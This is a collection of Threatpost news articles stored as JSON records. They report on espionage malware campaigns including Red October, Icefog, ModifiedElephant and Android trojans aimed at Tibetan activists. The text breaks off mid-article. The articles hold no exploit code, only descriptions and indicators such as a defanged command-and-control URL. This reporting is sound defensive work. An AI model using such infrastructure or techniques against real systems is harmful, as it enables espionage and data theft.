Word docs exploiting [CVE-2010-3333](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3333>) or [CVE-2012-0158](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158>). These exploits were used in previous attacks against Tibetan activists and military and energy targets in Asia; for Rocra, the attackers not only reused the exploits, but replaced the payload with their own malware.\n\nThe documents are tailored for specific victims and the malware modules have specific victim ID numbers, Kaspersky said. Rocra operates on a personal level with the victim; the level of interaction is high and driven by the victim\u2019s system configuration, the types of documents on their machine, software installed, native language and more.\n\nOnce the victim opens the malicious document, a Trojan is dropped on the machine which drops a module that scans the local network for other hosts vulnerable to [MS08-067](<http://technet.microsoft.com/en-us/security/bulletin/ms08-067>), the same vulnerability exploited by the Conficker worm, Kaspersky said. It also looks to access other hosts using credentials from its own password database. Another module tries to infect remote hosts on the same network. Kaspersky said the malware authors have Russian-speaking origins, and researchers had not seen the malicious executables before; one, for example, would change the default system codepage to 1251, which is required to render Cyrillic fonts, Kaspersky\u2019s report said.\n\nThe campaign targets not only Office documents, email and a long list of document types including the acid* extension, which Kaspersky said refers to the classified Acid Cryptofiler software used by the European Union and NATO.\n\n[](<http://www.securelist.com/en/images/pictures/klblog/208194085.png>)\n\n\u201cThe main purpose of the operation appears to be the gathering of classified information and geopolitical intelligence, although it seems that the information gathering scope is quite wide,\u201d the report said. \u201cDuring the past five years, the attackers collected information from hundreds of high profile victims although it\u2019s unknown how the information was used. It is possible that the information was sold on the black market, or used directly.\u201d\n\nThe command and control infrastructure behind this campaign is made up of 60 domains and a number of server host locations in Russia and Germany, most of which act as proxies in order to hide the true C&C server. Kaspersky said it was able to sinkhole six of the domains and watch them over since Nov. 2. More than 55,000 connections were made to the sinkhole from close to 250 IP addresses. Most of those IP addresses were in Switzerland, Kazakstan, Greece and Belarus; there are victims in 39 countries.\n\nKaspersky said it has not found any connections between Rocra and [Flame](<https://threatpost.com/flame-attackers-used-collision-attack-forge-microsoft-certificate-060512/>), yet did say the campaign was more sophisticated than the [Aurora attacks on Google](<https://threatpost.com/inside-aurora-google-attack-malware-011910/>) or Night Dragon; its researchers found more than 1,000 unique malware files among 30 different categories, including reconnaisance, credential harvesting, email and USB specific, propagation, mobile devices and data exfiltration.\n\nSome of the modules are one-time tasks, while others must remain persistent. Examples of persistent tasks include: search and extract files from a USB drive; wait for a mobile phone to connect and if it\u2019s an iPhone or Nokia, steal its contents, or if a Windows phone, install a mobile version of Rocra; record keystrokes and screenshots; and more. Examples of one-time tasks include: collection of system, network and software information; extract browsing history, saved passwords, Windows account hashes and Outlook account information; write and execute arbitrary code; scan for administrative credentials; scan for Cisco network devices; and more.\n\nMassive amounts of data were lost, the researchers said.\n\n\u201cWith Rocra, the attackers managed to stay in the game for over 5 years and evade detection of most antivirus products while continuing to exfiltrate what must be hundreds of Terabytes by now,\u201d Kaspersky said.\n", "cvss3": {}, "published": "2013-01-14T13:00:00", "type": "threatpost", "title": "Rocra Espionage Malware Campaign Uncovered After Five Years of Activity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2009-3120", "CVE-2010-3333", "CVE-2012-0158"], "modified": "2013-05-10T14:24:31", "id": "THREATPOST:551363592C0C853E266999644B3579E4", "href": "https://threatpost.com/rocra-espionage-malware-campaign-uncovered-after-five-years-activity-011413/77397/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:02", "description": "[](<https://threatpost.com/researchers-uncover-targeted-attack-campaign-using-android-malware-032613/>)Android attacks have become all the rage in the last year or two, and targeted attacks against political activists in Tibet, Iran and other countries also have been bubbling up to the surface more and more often lately. Now those two trends have converged with the discovery of a targeted attack campaign that\u2019s going after Tibetan and Uyghur activists with a spear-phishing message containing a malicious APK file. Researchers say the attack appears to be coming from Chinese sources.\n\nThe new campaign began a few days ago when unknown attackers were able to compromise the email account of a well-known Tibetan activist. The attackers then used that account to begin sending a series of spear-phishing messages to other activists in the victim\u2019s contact list. One of the messages referred to a human rights conference in Geneva in March, using the recipients\u2019 legitimate interest in the conference as bait to get them to open the attachment. The malicious attachment in the emails is named \u201cWUC\u2019s Conference.apk\u201d.\n\nOnce the victim opens the attachment on her Android phone, the file installs an application called \u201cconference\u201d that will display some information about the Geneva conference. Meanwhile, the malware is running in the background.\n\n\u201cWhile the victim reads this fake message, the malware secretly reports the infection to a command-and-control server. After that, it begins to harvest information stored on the device,\u201d according to an [analysis of the attack by Kaspersky Lab](<https://www.securelist.com/en/blog/208194186/Android_Trojan_Found_in_Targeted_Attack>) researchers.\n\n\u201cIt is important to note that the data won\u2019t be uploaded to C&C server automatically. The Trojan waits for incoming SMS messages (the \u201calarmReceiver.class\u201d) and checks whether these messages contain one of the following commands: \u201csms\u201d, \u201ccontact\u201d, \u201clocation\u201d, \u201cother\u201d. If one these commands is found, then the malware will encode the stolen data with Base64 and upload it to the command and control server.\u201d\n\n\n\nThe malware looks for a specific set of data, including contacts, call logs, SMS messages, geolocation and phone data. The malware communicates with a command-and-control server at the URL: _hxxp://64.78.161.133/*victims\u2019s_cell_phone_number*/process.php. _The malware authors apparently have some familiarity with the Tibetan language, as some of the commands use native words. However, there also are a number of Chinese words and commands in the code, as well.\n\n\u201cThroughout the code, the attackers log all important actions, which include various messages in Chinese. This was probably done for debugging purposes, indicating the malware may be an early prototype version,\u201d the Kaspersky analysis says.\n\nInterestingly, the C2 server for the attack is located in Los Angeles and is registered to a companybased in Beijing. While this is one of the first known targeted attack campaigns to utilize Android as a delivery mechanism, it likely won\u2019t be the last.\n\n\u201cEvery day, there are hundreds if not thousands of targeted attacks against Tibetan and Uyghur supporters. The vast majority of these target Windows machines through Word documents exploiting known vulnerabilities such as CVE-2012-0158, CVE-2010-3333 and CVE-2009-3129,\u201d the analysis says.\n\n\u201cIn this case, the attackers hacked a Tibetan activist\u2019s account and used it to attack Uyghur activists. It indicates perhaps an interesting trend which is exploiting the trust relationships between the two communities. This technique reminds us of a combination between ages old war strategies \u2018Divide et impera\u2019 and \u2018By way of deception\u2019.\u201d\n", "cvss3": {}, "published": "2013-03-26T14:14:02", "type": "threatpost", "title": "Researchers Uncover Targeted Attack Campaign Using Android Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2009-3129", "CVE-2010-3333", "CVE-2012-0158"], "modified": "2013-04-17T16:30:29", "id": "THREATPOST:4474B9334E9322D775C57232CC4127EF", "href": "https://threatpost.com/researchers-uncover-targeted-attack-campaign-using-android-malware-032613/77667/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:48", "description": "One of the alleged mandates around the development of the Stuxnet worm was that malware\u2019s numerous components\u2014which included a handful of zero days\u2014should never escape the Natanz uranium enrichment facility in Iran. Eight years later, evidence continues to mount as to how that mandate was categorically not met.\n\nKaspersky Lab today released a [report](<https://securelist.com/analysis/publications/78125/exploits-how-great-is-the-threat/>) on exploits in the wild that indicates that endpoints are still running head-on into exploits for the since-patched [LNK vulnerability](<https://threatpost.com/key-stuxnet-lnk-spreading-mechanism-stops-working-062512/76730/>) ([CVE-2010-2568](<https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568>)), almost two times more in 2016 than the next most prevalent exploit in circulation, Lotoor, which roots Android devices. In 2016, the Kaspersky report says, exploits for the LNK vulnerability (25 percent) and Lotoor (16 percent) account for 41 percent of exploits encountered by users. While these numbers are down from 2015 (27 percent and 11 percent respectively), the [LNK exploit](<https://securelist.com/blog/events/33206/the-day-the-stuxnet-died-27/>) appears to be hanging around for the foreseeable future.\n\n\u201cThis may be due to the fact that malware that uses these exploits have a self-replicating feature, constantly recreating themselves in the attacked network where vulnerable computers are installed,\u201d Kaspersky Lab said in its report.\n\nThe LNK exploit was just part of the Stuxnet attacks on Natanz, which targeted not only Windows machines running in the facility, but primarily Siemens programmable logic controllers managing centrifuges used to enrich uranium to support Iran\u2019s nuclear efforts. Exploits revolved around maliciously crafted .LNK files that were not processed securely as Windows Explorer icons were displayed. Successful exploits allowed the attackers to execute code in the Windows shell on vulnerable machines.\n\nLNK files define shortcuts to files or directories; Windows allows them to use custom icons from control panel files (.CPL). In Windows, those icons are loaded from modules, either executables or DLLs; CPLs are DLLs. An attacker is able to then define which executable module would be loaded, and use the .LNK file to execute arbitrary code inside of the Windows shell.\n\nWhile Microsoft quickly patched the vulnerability once it was disclosed in 2010, it was reported five years later that [the original patches were incomplete](<https://threatpost.com/patched-windows-machines-exposed-to-stuxnet-lnk-flaw-all-along/111558/>), forcing Microsoft to release an update bulletin with new patches.\n\nThe Kaspersky report, meanwhile, demonstrates the value of reliable exploits to attackers. Many of the exploits called out in the report are not flashy unpatched zero-days, but instead have some mileage on them. While [exploit kits dropped off](<https://threatpost.com/where-have-all-the-exploit-kits-gone/124241/>) the lists of top threats, venerable standbys such as CVE-2012-0158 in Office and CVE-2014-2423 in Java continue to draw the attention of exploit writers.\n\nThe widespread disappearance of exploit kits\u2014largely because of the [arrest of the criminals behind Angler](<https://threatpost.com/inside-the-demise-of-the-angler-exploit-kit/120222/>)\u2014has forced criminals to return to email-based attacks with macro-based malware buried inside Office attachments, now a top vehicle for malware delivery.\n\nFor example, attacks against browser and Windows vulnerabilities dropped 33.4 percent and 21.5 percent respectively from 2015 to 2016, Kaspersky said, while Office exploits rose 103 percent. While exploits against Adobe Flash and Android rose last year, Java and Adobe Reader exploits joined browsers and Windows on the negative side.\n\nKaspersky Lab said the number of browser vulnerabilities overall dropped 8 percent last year, while disclosed Office bugs went up 20 percent.\n\nOther noteworthy data points from the report include:\n\n * Kaspersky said it blocked 702 million attacks using an exploit in 2016, up 24 percent from 2015\n * Corporate users encountering attacks using exploits increased 28 percent\n * 70 percent of users encountered browser, Windows, Android or Office exploits\n * Russian-speaking APT Sofacy has used six zero-day exploits and 25 vulnerabilities overall; Equation Group has used eight zero days, and 17 vulnerabilities\n * 15 percent of computers in Europe and North America are still vulnerable to CVE-2012-0158\n", "cvss3": {}, "published": "2017-04-20T12:15:46", "type": "threatpost", "title": "Stuxnet LNK Exploits Still Widely Circulated", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-2568", "CVE-2012-0158", "CVE-2014-2423"], "modified": "2017-04-25T19:46:48", "id": "THREATPOST:C6DD041BAAC1DCF6C44CCBD19C9F1F13", "href": "https://threatpost.com/stuxnet-lnk-exploits-still-widely-circulated/125089/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:33", "description": "The [Red October espionage malware campaign](<https://threatpost.com/rocra-espionage-malware-campaign-uncovered-after-five-years-activity-011413/>) is providing security researchers with a deep dive into the complexity of targeted attacks, which in this case made use of more than 1,000 malware modules for everything from reconnaissance on targets to exfiltration of data to command and control servers.\n\nThe moving parts behind Red October are vast and have been under wraps for the better part of five years, [Kaspersky Lab researchers revealed this week](<http://www.securelist.com/en/blog/785/The_Red_October_Campaign_An_Advanced_Cyber_Espionage_Network_Targeting_Diplomatic_and_Government_Agencies>). The attackers behind this campaign targeted victims in 39 countries, primarily diplomats, researchers and military facilities among other institutions since August 2007. They stole reams of data and used exploits for known Microsoft vulnerabilities, constantly uploading their loot to a network of 60 command and control servers\u2014a number that rivals the 90-plus domains used by the Flame cyberespionage campaign.\n\nKaspersky was able to sinkhole a half dozen of those domains and watch over a two-month period 250 unique IP addresses connect more than 55,000 times. What they found was a fascinating mix of tasks mandated by the attackers, some of which remained persistent on compromised machines, while others were one-time operations. Most noteworthy is that attacks were tailored for particular victims, each with a unique identifier that enables the attacker to cobble together a complete picture of the victim\u2019s system configuration, browsing habits and more and manage each attack individually if need be.\n\n\u201cThis campaign is extraordinary in terms of the amount of effort that was invested to tailor the attack toolset for victims\u2019 environments,\u201d said senior security researcher Kurt Baumgartner.\n\nMost of the tasks assigned by the attacker via backdoors installed during initial infection are one-time operations delivered by a portable executable (PE) DLL that are executed in memory and discarded, Kaspersky said today in an [expanded report on the campaign](<http://www.securelist.com/en/blog/208194091/Red_October_part_two_the_modules>).\n\nOther tasks require a persistent presence on a machine and are delivered as PE EXE files. The attackers are using these persistent tasks to continually log keystrokes, record screenshots, retrieve email messages from Outlook or execute malicious payloads embedded in any of the Office-document exploits used to establish backdoor communication with the C&C servers.\n\nUnique among the persistent modules are those that are related to USB drives and mobile devices.\n\nFor example, one module will search and extract files and deleted files from a USB drive once it is connected to a compromised machine. Deleted files are restored and exfiltrated. Another module waits for an iPhone or Nokia smartphone to connect to the machine, then grabs device information, including contact information, call history, SMS messages, calendars and more. There is also a Windows Mobile module, which once one of those devices connects, infects the phone with a mobile version of the malware.\n\nThe campaign also targets documents with the acid* extension, which Kaspersky said refers to the classified Acid Cryptofiler software used by the European Union and NATO.\n\n\u201cThere is an incredible amount of functionality here that is new,\u201d Baumgartner said. \u201cIt\u2019s unusual to see it all in one campaign.\u201d\n\nSome of the one-time tasks include: collecting device hardware and software specs; filesystem and network share information; collecting information on installed software, including Oracle Database, messaging software and drivers and software for mobile devices and USB drives; extraction of browsing history from all leading browsers, saved passwords for websites, mail and IM accounts, Windows account hashes, and Outlook account information. Others include the ability to download files from FTP servers reachable from the infected machine, writing and executing code from the attacker, doing network scans and dumping configuration data from Cisco devices, and doing a network scan for other computers on the network vulnerable to the same exploit used by [Conficker (MS08-067)](<http://technet.microsoft.com/en-us/security/bulletin/ms08-067>).\n\nIn all there are nine module groups discovered in this campaign: reconnaissance; password or credential harvesting; email; USB drive; keyboard; persistence; propagation; mobile; and data exfiltration.\n\nKaspersky was alerted to the Red October campaign by a partner reporting a spear phishing campaign. Four exploits have been used in the attack, on targeting [CVE-2009-3129](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3129>) using a malicious Microsoft Excel document, two others are Word docs exploiting [CVE-2010-3333](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3333>) or [CVE-2012-0158](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158>). The fourth is a Java exploit discovered by researchers at Seculert. All of the Office exploits were used in previous attacks against Tibetan activists and military and energy targets in Asia, Kaspersky said.\n\nMost of the 60 C&C domains are in Russia and Germany while the victims are worldwide with most of the IP addresses connecting from Switzerland, Kazakhstan, Greece and Belarus. The attacks have not been attributed as of yet. A heat map of the attacks showed victims across the globe, but none in China leading to speculation the Chinese could be behind the campaign. But Kaspersky researcher Costin Raiu cautioned today on the [Digital Underground podcast](<https://threatpost.com/costin-raiu-red-october-cyberespionage-campaign-011713/>) that because the company was able to sinkhole only six domains, they may not be seeing the complete infection picture.\n\nThe campaign, meanwhile, may be shutting down, Raiu said, adding that the infrastructure is being taken off line with registrars killing the 60 domains and hosting companies killing the C&C servers.\n", "cvss3": {}, "published": "2013-01-17T19:20:06", "type": "threatpost", "title": "Inside the 1,000 Red October Cyberespionage Malware Modules", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2009-3120", "CVE-2009-3129", "CVE-2010-3333", "CVE-2012-0158"], "modified": "2013-05-10T14:15:16", "id": "THREATPOST:C0872257AF615C3542B0C9F0BAE4A57D", "href": "https://threatpost.com/inside-1000-red-october-cyberespionage-malware-modules-011713/77419/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:05", "description": "An espionage campaign featuring precise targeting of victims and malware that allows the attackers one-on-one interaction with compromised systems has been uncovered. Government agencies, manufacturers, high tech companies and media organizations in South Korea and Japan have been the primary targets of the campaign called Icefog, which was reported today by researchers at Kaspersky Lab.\n\nThe China-based campaign is two years old and follows the pattern of similar APT-style attacks where victims are compromised via a malicious attachment in a spear-phishing email, or are lured to a compromised website and infected with malware.\n\n\n\nHowever, while other APT campaigns maintain a long-term persistence inside infected networks, Icefog seems to do just the opposite. The attackers, Kaspersky researchers said, know what they need from a victim and once they have it, the target is abandoned. They\u2019re also likely a small group of hired guns, akin to mercenaries, used to attack a particular group, steal data, and get out quickly.\n\n\u201cWe\u2019ve entered the era of a growing number of these smaller, agile groups hired on a per-project basis,\u201d said Kaspersky Lab researcher Kurt Baumgartner, speaking today at the Billington Cybersecurity Summit in Washington, D.C. \u201cThe operational improvements have arrived and these polished APT groups become much better at flying under the radar.\n\n\u201cFinding a pattern in all the noise is not easy. It\u2019s becoming harder and harder to identify the patterns and connect them with a group,\u201d Baumgartner said.\n\nTo date, Kaspersky Lab\u2019s Global Research and Analysis Team has observed six variants of Icefog and has been able to sinkhole 13 domains used in the attack, capturing snapshots of the malware used and logs detailing victims and interaction with command and control servers.\n\nWindows and Mac OS X versions of Icefog have also been observed, but it appears the OS X backdoor is merely a beta trial of the malware, largely found in online Chinese bulletin boards. Meanwhile, more than 200 unique Windows-based IP addresses have connected to a Kaspersky-controlled sinkhole, a fraction of the total infections researchers said.\n\n\u201cThere\u2019s a team of operators that are being very selective and going after exactly what they need,\u201d said Baumgartner, right. \u201cIt\u2019s classic APT behavior. They likely have previous knowledge of the networks and targets.\u201d\n\nThose targets include defense industry contractors such as Lig Nex1 and Selectron Industrial Company, shipbuilding companies DSME Tech, Hanjin Heavy Industries, telecom operators such as Korea Telecom and media companies such as Fuji TV.\n\nIcefog not only establishes a backdoor connection to the attacker-controlled command infrastructure, but it also drops a number of tools that allow the attackers to steal certain document types and pivot within an infected company looking for more computers to infect and additional resources to steal.\n\nThe campaign also relies on exploits for vulnerabilities that have been patched in Windows or Java to establish a foothold on an endpoint. Remote code execution bugs in Windows (CVE-2012-0158 and CVE-2012-1856) spread via malicious Word or Excel files are the most common means of initiating the Icefog attack. The infected attachments promise anything from an illicit image of a woman to a document written in Japanese titled: \u201cLittle enthusiasm for regional sovereignty reform.\u201d Users are also sent links to compromised sites hosting Java exploits (CVE-2013-0422 and CVE-2012-1723).\n\nSeparate spear phishing campaigns were also spotted using HLP files\u2014older versions of Winhelp files\u2014to infect targets. Winhelp was supported natively until Windows Vista was released.\n\n\u201cMost likely, the choice to abuse Winhelp indicates that the attackers have an idea of what version operating systems they are attacking,\u201d the Kaspersky report said.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/09/22105452/icefog.pdf>)\n\nAnother spear phishing effort used HWP document files to spread Icefog; HWP is a proprietary document format used in South Korea, in particular by the government.\n\nOnce a machine is compromised, the attackers individually analyze system information and files stored on the machine and if it passes muster, the backdoor and lateral movement tools are remotely sent to the machine, including password and hash-dumping tools for saved Internet Explorer and Outlook passwords. A compression program is also sent down to compress stolen data before it\u2019s sent to the command and control server. Beyond credentials, victims are losing Windows address book files (.WAB), as well as HWP, Excel and Word files.\n\nOf the six variants, the oldest in 2011 was used in an attack against Japan\u2019s House of Representatives and House of Councilors. Six AOL email addresses were used and commands were also fetched from these accounts.\n\nThe most commonly seen Icefog variant is called Type 1 and it has all the backdoor and lateral movement capabilities described earlier, as well as giving the attackers access to execute SQL commands on SQL Servers found on the network. It\u2019s here where the term Icefog was seen in a string used in the command and control server (the C&C software is named Dagger Three). The command and control script, meanwhile, provides a professional looking interface used to communicate and interact with compromised machines. It uses the native file system to store stolen data and temporary files.\n\n\u201cPerhaps the most interesting part is that the Type 1 C&C panel maintains a full history of the attacker\u2019s interaction with the victims,\u201d the report said. \u201cThis is kept as an encrypted logfile, in the \u2018logs\u2019 directory on the server. In addition to that, the server maintains full interaction logs and command execution results from each victim.\u201d\n\nAnother variant was used to enhance Type 1 infections with additional encryption obfuscating communication with command servers. It was not used against victims and disappeared once a machine was rebooted.\n\nSamples for two other variants have yet to be obtained, but Kaspersky was able to sinkhole three domains used with these attacks. These two variants had only view and update capabilities.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/09/07040656/ips_icefog.jpg>)\n\nThe most recent version, Icefog-NG, doesn\u2019t communicate with a central command server and instead of using a webserver, its command and control is a Windows desktop application that works as a standalone TCP server listening on port 5600.\n\nKaspersky said it first obtained an Icefog sample in June after an attack on Fuji TV. It was able to connect the dots back to the attack on the Japanese parliament two years ago.\n\n\u201cWe predict the number of small, focused APT-for-hire groups to grow, specializing in hit-and-run operations, a kind of \u2018cyber-mercenaries\u2019 of the modern world,\u201d the report said.\n", "cvss3": {}, "published": "2013-09-25T16:30:30", "type": "threatpost", "title": "Icefog Targeted APT Attacks Hit South Korea, Japan", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2012-1723", "CVE-2012-1856", "CVE-2013-0422"], "modified": "2018-03-22T14:54:55", "id": "THREATPOST:191B75DFBFEAFA9F2F649D66191A07C9", "href": "https://threatpost.com/icefog-espionage-campaign-is-hit-and-run-targeted-operation/102417/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:27", "description": "Tibetans, journalists and human rights workers in Hong Kong and Taiwan have been targeted in an APT campaign that makes use of Microsoft Rich Text File (RTF) documents to compromise computers. Researchers say it\u2019s a new strategy by attackers in an ongoing advanced persistent threat that dates back to 2009.\n\nAccording to Arbor Networks, the RTF document-based attack uses four known vulnerabilities (CVE-2012-0158, CVE-2012-1856, CVE-2015-1641 and CVE-2015-1770) in one attachment. This is the first time, researchers say, that attackers associated with this APT have packed four vulnerabilities inside a single RTF document.\n\nOnce compromised, the vulnerabilities are being used to deliver malware payloads such as Grabber, T9000, Kivars, PlugX, Gh0StRAT and Agent.XST, according to Arbor Networks, which published a report Monday of its [findings (PDF)](<https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/04/ASERT-Threat-Intelligence-Report-2016-03-The-Four-Element-Sword-Engagement.pdf>).\n\nArbor Networks said attackers are borrowing a best-of-breed mix of past technology used in previous and related APT attacks against similar journalist and human rights targets. \u201cWhat we have been able to do is update an ongoing APT and show how malware, techniques and spear phishing techniques have been refreshed for the present day,\u201d said Curt Wilson, senior threat intelligence analyst at Arbor Networks, in an interview with Threatpost.\n\nIn the week preceding the January 2016 Taiwanese general election, human rights lawyers and Tibetan activists received a phishing email purporting to come from a human rights organization. The email included the subject line \u201cUS Congress sanctions $6 million fund for Tibetans in Nepal and India.\u201d Attached was an RTF file that contained the four-pronged RTF file.\n\nAnyone who opened the email attachment was injected with the Grabber (aka EvilGrab) malware into their computer system\u2019s ctfmon.exe process, Arbor Networks said. Grabber then triggered the download of a host of malicious software such as remote access Trojans, giving attackers access to the system and the ability to load additional malicious code.\n\nPayloads varied from Grabber, T9000, Kivars, PlugX, Gh0StRAT and Agent.XST just as the phishing email subject lines varied. \u201c[BULK] TIBET, OUR BELOVED NATION AND WILL NEVER FORGET IT,\u201d read another subject line harboring an RTF file that ultimately infected systems with the Kivars Keylogger Payload.\n\nWilson said none of the payloads or exploits were new. He added, \u201cBeing able to draw a line from one APT to another is an extremely important step when it comes to fighting APTs and ideally \u2013 in this case \u2013 keeping those fighting for human rights out of jail.\u201d\n\nWilson said the espionage campaign against journalists, activists and human rights advocates appears to be connected to an even broader set of targets and operations. Also on Monday, The Citizen Lab, part of the Munk School of Global Affairs, [similarly published a report tracking](<https://citizenlab.org/2016/04/between-hong-kong-and-burma/>) advanced persistence threats targeting Hong Kong and Myanmar/Burman democracy activists.\n", "cvss3": {}, "published": "2016-04-19T07:00:14", "type": "threatpost", "title": "APT Threat Targets Tibetans, Journalists and Human Rights Workers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2012-1856", "CVE-2015-1641", "CVE-2015-1770"], "modified": "2016-04-19T01:45:15", "id": "THREATPOST:DB438BDD32A19C608E74D09992D53881", "href": "https://threatpost.com/apt-targeting-tibetans-packs-four-vulnerabilities-in-one-compromise/117493/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-02-11T21:10:33", "description": "Threat actors are hijacking the devices of India\u2019s human rights lawyers, activists and defenders, planting incriminating evidence to set them up for arrest, researchers warn.\n\nThe actor, dubbed ModifiedElephant, has been at it for at least 10 years, and it\u2019s still active. It\u2019s been shafting targets since 2012, if not sooner, going after hundreds of groups and individuals \u2013 some repeatedly \u2013 according to SentinelLabs researchers.\n\nThe operators aren\u2019t what you\u2019d call technical prodigies, but that doesn\u2019t matter. Tom Hegel, threat researcher at SentinelOne, said in a Wednesday [post](<https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/>) that the advanced persistent threat (APT) group \u2013 which may be tied to the [commercial surveillance](<https://threatpost.com/quadream-israeli-spyware-weaponized-iphone-bug/178252/>) industry \u2013 has been muddling along just fine using rudimentary hacking tools such as commercially available remote-access trojans (RATs).\n\nThe APT is snaring victims with spearphishing, delivering malware via rigged documents.\n\nThe group\u2019s preferred malwares include [NetWire](<https://threatpost.com/netwire-rat-back-stealing-payment-card-data/122156/>), [DarkComet](<https://threatpost.com/darkcomet-rat-flames-out-070912/76777/>) and simple keyloggers \u201cwith infrastructure overlaps that allow us to connect long periods of previously unattributed malicious activity,\u201d Hegel wrote.\n\nThe DarkComet RAT, for one, has been used in politically motivated attacks for at least as long as ModifiedElephant has been doing its dirty work. In 2012, its author [threw in](<https://threatpost.com/darkcomet-rat-flames-out-070912/76777/>) the towel on development and sales after finding out that[ DarkComet was used by the Syrian government](<https://threatpost.com/syrian-government-using-skype-spyware-monitor-rebels-050412/>) in attacks against anti-government activists.\n\n## Frumpy Old Tools\n\n\u201cThere\u2019s something to be said about how mundane the mechanisms of this operation are,\u201d said Juan Andr\u00e9s Guerrero-Saade, threat researcher at SentinelOne and adjunct professor at Johns Hopkins SAIS,[ via Twitter](<https://twitter.com/juanandres_gs/status/1491784707008122885?s=20>). \u201cThe malware is either custom garbage [or] commodity garbage. There\u2019s nothing *technically* impressive about this threat actor, instead we marvel at their audacity.\u201d\n\nIn fact, ModifiedElephant uses old Visual Basic keyloggers that \u201care not the least bit technically impressive,\u201d Hegel wrote, noting that the overall keylogger structure resembles code that was freely available on [Italian hacking forums](<https://italianhack.forumfree.it/?t=63131534>) back in 2012. The loggers don\u2019t even work anymore, he said, given that they\u2019re built \u201cin such a brittle fashion.\u201d\n\nModifiedElephant is also sending a commodity Android trojan payload, delivered as an APK file (0330921c85d582deb2b77a4dc53c78b3), along with the NetWire trojan. The Android trojan tries to trick recipients into installing the malware themselves, by posing as a news app or a safe messaging tool.\n\nBelow is an example of ModifiedElephant\u2019s phishing emails, which include attachments for the NetWire and Android trojan variants.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/11142225/phishing-email-sample-e1644607361703.jpg>)\n\nModifiedElephant phishing email with malicious attachments for Netwire and [Android GM Bot](<https://threatpost.com/source-code-for-android-banking-malware-leaked/116380/>) variants. Source: SentinelLabs.\n\nThe Android trojan appears to have been designed as a multi-purpose hacking tool for broader cybercrime, researchers said. But the fact that it\u2019s delivered at the same time as NetWire means that the same attacker was trying to target victims across the spectrum, getting them both from the endpoint and on mobile.\n\nThe trojan enables attackers to intercept and manage SMS and call data, wipe or unlock the device, perform network requests, and perform remote administration, according to SentinelLabs: In other words, it\u2019s a basic, ideal, low-cost mobile surveillance toolkit.\n\n## Evidence Tampering\n\nAn example of the incriminating files planted by ModifiedElephant is a file, Ltr_1804_to_cc.pdf, that detailed an assassination plot against India Prime Minister Narendra Modi. Arsenal Consulting\u2019s digital analysis shows that the file \u2013 one of the more [incriminating pieces](<https://web.archive.org/web/20210917152050/https://scroll.in/article/991095/why-isnt-the-government-looking-for-the-source-of-modi-assassination-malware-on-rona-wilsons-pc>) of data seized by police \u2013 was one of many files delivered via a NetWire RAT remote session associated with ModifiedElephant.\n\n\u201cFurther analysis showed how ModifiedElephant was performing nearly identical evidence creation and organization across multiple unrelated victim systems within roughly fifteen minutes of each other,\u201d according to SentinelLabs\u2019 detailed [report](<https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/>).\n\nIf the notion of a threat actor tampering with evidence sounds familiar, it might be because ModifiedElephant\u2019s tactics have precedence, Guerrero-Saade [tweeted](<https://twitter.com/juanandres_gs/status/1491784711110234126>).\n\nA few months back, SentinelOne [reported](<https://www.sentinelone.com/labs/egomaniac-an-unscrupulous-turkish-nexus-threat-actor/>) on EGoManiac, a Turkish nexus (as in, its malware contained Turkish language, its lures were written in Turkish, and its victims are Turkish and related to local politics) threat actor that was doing similar with the Octopus Brain campaign.\n\nIn that campaign, Arsenal Consulting\u2019s digital forensics revealed that the threat actor [planted](<https://otx.alienvault.com/pulse/5859cea0a759501d3b140f5b>) incriminating files on the systems of journalists working at the Turkish online news portal OdaTV immediately before Turkish National Police seized their machines. The fabricated files were later used as evidence of terrorism and justification for jailing journalists.\n\n\u201cA threat actor willing to frame and incarcerate vulnerable opponents is a critically underreported dimension of the cyber threat landscape that brings up uncomfortable questions about the integrity of devices introduced as evidence,\u201d SentinelOne\u2019s Hegel pointed out in Wednesday\u2019s post.\n\nAnalyzing EGoManiac\u2019s intrusions revealed the decade\u2019s worth of malicious activity that SentinelLab now attributes to a previously unknown threat actor \u2013 namely, ModifiedElephant.\n\n\u201cThis actor has operated for years, evading research attention and detection due to their limited scope of operations, the mundane nature of their tools, and their regionally-specific targeting,\u201d Hegel said. What\u2019s more, it\u2019s still actively targeting victims.\n\n## Victimology\n\nModifiedElephant\u2019s goal is long-term surveillance, sometimes leading up to the delivery of 